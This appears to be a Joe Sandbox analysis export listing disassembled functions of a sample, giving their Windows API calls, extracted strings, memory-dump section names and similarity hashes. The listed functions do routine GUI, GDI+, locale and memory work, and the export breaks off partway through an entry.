Function 00401370 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191windowtimeCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(?,00000000), ref: 004013DE
SendMessageTimeoutW.USER32(00000000,00000482,00000000,00000000,00000000,000001F4,?), ref: 0040144D

Strings

D, xrefs: 00401524

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FindMessageSendTimeoutWindow
String ID: D
API String ID: 268879178-2746444292
Opcode ID: f4ee3c1af0cf60ef854e83e47984dfbd58c2a3ca7a2eba1856335f5b7f505960
Instruction ID: 481e3f3d92956ef3c6451f9a1a9f2b2d2346e16efe979df89da2c867e663e90f
Opcode Fuzzy Hash: f4ee3c1af0cf60ef854e83e47984dfbd58c2a3ca7a2eba1856335f5b7f505960
Instruction Fuzzy Hash: 41617271A012189BDB20DF64DC857EEB7F8EF48314F1041EEE909AB290DB7559948F98

Function 0046B2E0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0046B31A

Strings

JudgeVersion, xrefs: 0046B46C

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CompareExchangeInterlocked
String ID: JudgeVersion
API String ID: 3335655927-3141317846
Opcode ID: 0ecbdfe166c5bebd30eb261c0c8ef50c319c222485f1cf943476c2ca230a06d4
Instruction ID: 3b7b9f668524382cd8ac4177d688221d19d61c84cee5e35e16d0a2d80bced07e
Opcode Fuzzy Hash: 0ecbdfe166c5bebd30eb261c0c8ef50c319c222485f1cf943476c2ca230a06d4
Instruction Fuzzy Hash: 6A6170B26087019BD314CF65D884B5BB7E4FB88714F10462EE949D3350EB39E944CBDA

Function 004A883F Relevance: 18.1, APIs: 12, Instructions: 139COMMON

Download Yara Rule

APIs

____lc_handle_func.LIBCMT ref: 004A8873
____lc_codepage_func.LIBCMT ref: 004A887B
__GetLocaleForCP.LIBCPMT ref: 004A88A4
____mb_cur_max_l_func.LIBCMT ref: 004A88BA
MultiByteToWideChar.KERNEL32(00000001,00000009,?,00000002,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A88D9
____mb_cur_max_l_func.LIBCMT ref: 004A88E7
___pctype_func.LIBCMT ref: 004A890C
____mb_cur_max_l_func.LIBCMT ref: 004A8932
____mb_cur_max_l_func.LIBCMT ref: 004A894A
____mb_cur_max_l_func.LIBCMT ref: 004A8962
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A896F
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000001,?,00000000,?,?,?,?,0044C2DA,?), ref: 004A89A0

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
String ID:
API String ID: 3819326198-0
Opcode ID: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
Instruction ID: be4efcea82c7acbbaf84cbdbf0495d91bd9ba5531dcccb3550ff59639d1780ae
Opcode Fuzzy Hash: 73e849e4132e983badf23de25d457494f94d89d203377f43e4ad4c91586d2649
Instruction Fuzzy Hash: 8841B471104246AEDB206F319C41B7B7BA9EF23351F24842FF8559A292DF3CC950DB59

Function 00435210 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 403COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004353F8
SetRectEmpty.USER32(?), ref: 0043565D

Strings

controls, xrefs: 0043556E, 00435581, 00435596
@RN, xrefs: 0043524A
icon_layers, xrefs: 00435613, 00435626, 00435675
%s%s\icons.json, xrefs: 0043531D
version, xrefs: 004354BC
parent_id, xrefs: 004355FE
T9N, xrefs: 004352B5
pages, xrefs: 004354E4, 004354FD, 00435518

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: EmptyRect_memset
String ID: %s%s\icons.json$@RN$T9N$controls$icon_layers$pages$parent_id$version
API String ID: 2511957577-2168337955
Opcode ID: 243845770d4022a3ba12f8d380d361a4b50e97f63c6dc543fc57af5cd8e2e970
Instruction ID: 275f87db37a2c9f2092ddbdb078b997c46d1c15bb50ee1b5c51c97e68eaad257
Opcode Fuzzy Hash: 243845770d4022a3ba12f8d380d361a4b50e97f63c6dc543fc57af5cd8e2e970
Instruction Fuzzy Hash: 7FF1C170900258DFCB25EB65C881BEEB7B4AF58304F1481EFE509A7242DB785E85CF99

Function 0047AAD0 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 154libraryloaderCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047AB3D
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 0047AB4F
LoadLibraryW.KERNEL32(?), ref: 0047ABEE
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 0047ABFA
LoadLibraryW.KERNEL32(?), ref: 0047AC5F
GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 0047AC6B

Strings

\Shcore.dll, xrefs: 0047ABC1
\User32.dll, xrefs: 0047AC32
SetProcessDpiAwareness, xrefs: 0047ABF4
SetProcessDPIAware, xrefs: 0047AC65

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc$FolderPath_memset
String ID: SetProcessDPIAware$SetProcessDpiAwareness$\Shcore.dll$\User32.dll
API String ID: 1748625455-566016977
Opcode ID: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
Instruction ID: 93c2aa1886c6c8e1d4854a4f4d751b754c41071df73770d687a8d629c2286f7f
Opcode Fuzzy Hash: ff80ceac9f7b7110f44a33b3d835053ff2845b88fa8e460a05131bb4fc92fd49
Instruction Fuzzy Hash: 3A51AFB1508341AFD721EB64D845B9FB7E8AFC5704F44882EF98983241D679E818CB5B

Function 00424890 Relevance: 16.7, APIs: 11, Instructions: 221COMMON

Download Yara Rule

APIs

GdipResetPath.GDIPLUS(?), ref: 004248BA
GdipAddPathArcI.GDIPLUS(?,?,?,?,?), ref: 00424903
GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?), ref: 0042492F
GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424956
GdipAddPathLineI.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042497F
GdipAddPathArcI.GDIPLUS(?,?,?,?,?,?,?), ref: 004249B4
GdipClosePathFigure.GDIPLUS(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424A7B

Part of subcall function 004246F0: GdipResetPath.GDIPLUS(?), ref: 0042471A
Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
Part of subcall function 004246F0: GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: GdipPath$Line$Reset$CloseFigure
String ID:
API String ID: 2660712481-0
Opcode ID: 05a307259dadda739b757ace0e9b44f7e1851ef57646c1e8489a39c200f161cb
Instruction ID: 4a0c66622b68247810a171de605a71d5ab15b8fb2d0daafe8118e75e1a8016ed
Opcode Fuzzy Hash: 05a307259dadda739b757ace0e9b44f7e1851ef57646c1e8489a39c200f161cb
Instruction Fuzzy Hash: 5971ECB4700600AFDB14DF6DD985E6BBBE9EF89310718C66DA899CB348D634E800CB65

Function 0042E2E0 Relevance: 16.7, APIs: 11, Instructions: 166COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0042E36A
VariantCopy.OLEAUT32(?,00000000), ref: 0042E375
VariantClear.OLEAUT32(?), ref: 0042E3AD
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0042E3CD
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0042E3E6
VariantInit.OLEAUT32(?), ref: 0042E40C
VariantCopy.OLEAUT32(?,?), ref: 0042E41A
VariantClear.OLEAUT32(?), ref: 0042E455
VariantClear.OLEAUT32(?), ref: 0042E45B
SafeArrayUnlock.OLEAUT32(?), ref: 0042E461
SafeArrayDestroy.OLEAUT32(?), ref: 0042E46C

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Variant$ArraySafe$Clear$BoundCopyInit$DestroyUnlock
String ID:
API String ID: 3902834209-0
Opcode ID: 120b392e3baa1723652337ca06f25e8983af417b8f8f3787e895c8f0b97185c3
Instruction ID: bebac5beb3fe3608b87375f8885f3c8730b30ba1670c7eaca6d4d1e9a533f49e
Opcode Fuzzy Hash: 120b392e3baa1723652337ca06f25e8983af417b8f8f3787e895c8f0b97185c3
Instruction Fuzzy Hash: A451C571A00109EFDB00EFA5DC84ADE77B9EF59314F50862DFA15A7240DB399D05CBA4

Function 004813F8 Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000,?,0048175B,00000004,00482166,004811E3,0048109F), ref: 0048140B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,00000000,00000000,?,0048175B,00000004,00482166,004811E3,0048109F), ref: 00481461
GlobalHandle.KERNEL32(?), ref: 0048146A
GlobalUnlock.KERNEL32(00000000), ref: 00481474
GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 0048148D
GlobalHandle.KERNEL32(?), ref: 0048149F
GlobalLock.KERNEL32(00000000), ref: 004814A6
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000000,?,0048175B,00000004,00482166,004811E3,0048109F), ref: 004814AF
GlobalLock.KERNEL32(00000000), ref: 004814BB
_memset.LIBCMT ref: 004814D5
LeaveCriticalSection.KERNEL32(?), ref: 00481503

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: e37f382460a5e953f82d4cc1f6cec0d0e66669a7ada6300d097754d6326516a9
Instruction ID: 4f57d85edda92dc33f1fb6972c5a750abb4d95940558abfe117d43c26f84e85e
Opcode Fuzzy Hash: e37f382460a5e953f82d4cc1f6cec0d0e66669a7ada6300d097754d6326516a9
Instruction Fuzzy Hash: 8A31AD71600701AFD720AFB5DC89A5EBBEDEF84704B118A6EE546D3260DB78F841CB58

Function 00436660 Relevance: 16.6, APIs: 11, Instructions: 93windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00436671
CreateCompatibleDC.GDI32(00000000), ref: 00436693
SelectObject.GDI32(00000000), ref: 004366A5
GetWindowRect.USER32(?,?), ref: 004366B9
OffsetRect.USER32(?,0000000A,0000000A), ref: 004366D8
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 004366EF
GetClientRect.USER32(?,?), ref: 00436705

Part of subcall function 00433A00: CreateCompatibleDC.GDI32(?), ref: 00433A32
Part of subcall function 00433A00: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00433A4C
Part of subcall function 00433A00: SelectObject.GDI32(?,00000000), ref: 00433A59
Part of subcall function 00433A00: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00433A73

SendMessageW.USER32(?,000007E9,?,00000000), ref: 00436727

Part of subcall function 00433990: BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004339B2
Part of subcall function 00433990: SelectObject.GDI32(?,?), ref: 004339BF
Part of subcall function 00433990: DeleteObject.GDI32(?), ref: 004339CD
Part of subcall function 00433990: DeleteDC.GDI32(?), ref: 004339EB

SetViewportOrgEx.GDI32(00000000,00000000,?,00000000), ref: 0043673D
SelectObject.GDI32(00000000,?), ref: 00436748
DeleteDC.GDI32(00000000), ref: 0043674F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$Select$CompatibleCreateDeleteRectViewport$Window$BitmapClientMessageOffsetSend
String ID:
API String ID: 1637868518-0
Opcode ID: b4c83d55ae25c4934dcf3f9786f0eca457369af6644b2bbaeefde86fccae5f76
Instruction ID: c0df4666e800a506221e1a8d3eae2ba9367c003eafe8dd864a5ab916edfae826
Opcode Fuzzy Hash: b4c83d55ae25c4934dcf3f9786f0eca457369af6644b2bbaeefde86fccae5f76
Instruction Fuzzy Hash: 4D314F75A00219BFDB04DFA4CC89BAEB7BDFF48345F01456AE901A3240DB78A905CBA4

Function 004368A0 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 311windowCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00436905
PathRemoveFileSpecW.SHLWAPI(00000000,?), ref: 00436A8B
SysFreeString.OLEAUT32(00000000), ref: 00436AC4
__wcsicoll.LIBCMT ref: 00436ACF
PostMessageW.USER32(00000000,00000785,00000000,00000000), ref: 00436B86
InvalidateRect.USER32(00000000,00000000,00000001), ref: 00436BA5

Strings

T9N, xrefs: 00436A48
default, xrefs: 004368FF, 004369C7
T9N, xrefs: 0043693A

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcsicoll$FileFreeInvalidateMessagePathPostRectRemoveSpecString
String ID: T9N$T9N$default
API String ID: 4187723721-3275040786
Opcode ID: 8436fa98b3193ff5b67a1e9da3e9af34a053b27d83a9295353b7adfb58399884
Instruction ID: 750b6764a4a3082850caea60a13f92b1413eeb066e140d5be2e2192c1a065c92
Opcode Fuzzy Hash: 8436fa98b3193ff5b67a1e9da3e9af34a053b27d83a9295353b7adfb58399884
Instruction Fuzzy Hash: 98C1D571A00216EFDB10EFA4D881B9EB7B5EF48314F15852AE901BB341DB38ED45CB99

Function 004288D0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,?), ref: 004289A3
GetDC.USER32(00000000), ref: 004289F7
DeleteDC.GDI32(00000000), ref: 00428A11
GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78,?), ref: 00428A66
GdipFree.GDIPLUS(00000000,00000000,?,00000000,?,00000000,00000000,?,?,004BEF78,?,?,004C0B64,?,?,004BEF78), ref: 00428A6C
CopyRect.USER32(?,?), ref: 00428A96
GdipDeleteFont.GDIPLUS(?), ref: 00428B11
DeleteObject.GDI32(?), ref: 00428B1A

Strings

xK, xrefs: 00428974, 004289B2, 004289CB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Delete$Gdip$Font$CopyCreateFreeGraphicsObjectRect
String ID: xK
API String ID: 2892951979-4294704317
Opcode ID: 6943fff1b2c66cf5b1f2976df4707ceacc02259f7faa94841cd67901f94dc53e
Instruction ID: a09d9e1b0f579dff6a6a4d2c20492bf7a8fa672800bd25821b3eff6780f1c434
Opcode Fuzzy Hash: 6943fff1b2c66cf5b1f2976df4707ceacc02259f7faa94841cd67901f94dc53e
Instruction Fuzzy Hash: 0E818F71A01219EFCB14DFA8DC85BAEB7B5FF88310F14425EE914AB381DB74A901CB94

Function 004653E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?,?,?,?), ref: 00465445
ShowWindow.USER32(?,00000009), ref: 0046545D
ShowWindow.USER32(?,00000005), ref: 00465465
SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 0046547C
BringWindowToTop.USER32(?), ref: 00465482
SetForegroundWindow.USER32(?), ref: 0046548C
SwitchToThisWindow.USER32(?,00000001), ref: 00465498
SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003), ref: 004654AD

Strings

,, xrefs: 0046543E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$Show$BringForegroundPlacementSwitchThis
String ID: ,
API String ID: 3350741052-3772416878
Opcode ID: 8b08cc157807c43ec83bccded3fadd2c1bf415b8e7962edc780537769a9efea9
Instruction ID: 9edbe1b921b9a166ad7e3a4ff4c30b01aa94270f0070a4e13fda215b261b63db
Opcode Fuzzy Hash: 8b08cc157807c43ec83bccded3fadd2c1bf415b8e7962edc780537769a9efea9
Instruction Fuzzy Hash: 56314B70A10304AFDB60EF758D41BABB7F8BF48711F10466EE505E7A90EA74B840CB68

Function 0044C530 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 84COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0044C562

Part of subcall function 0048F048: RaiseException.KERNEL32(?,00000000,P0@,?,?,?,?,?,00403050,?,004CD820,?), ref: 0048F08A

__CxxThrowException@8.LIBCMT ref: 0044C5B6
__CxxThrowException@8.LIBCMT ref: 0044C5F0
__CxxThrowException@8.LIBCMT ref: 0044C62C

Strings

ios_base::eofbit set, xrefs: 0044C5F5
ios_base::failbit set, xrefs: 0044C5BF
,&L, xrefs: 0044C625
ios_base::badbit set, xrefs: 0044C573
,&L, xrefs: 0044C5E9

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
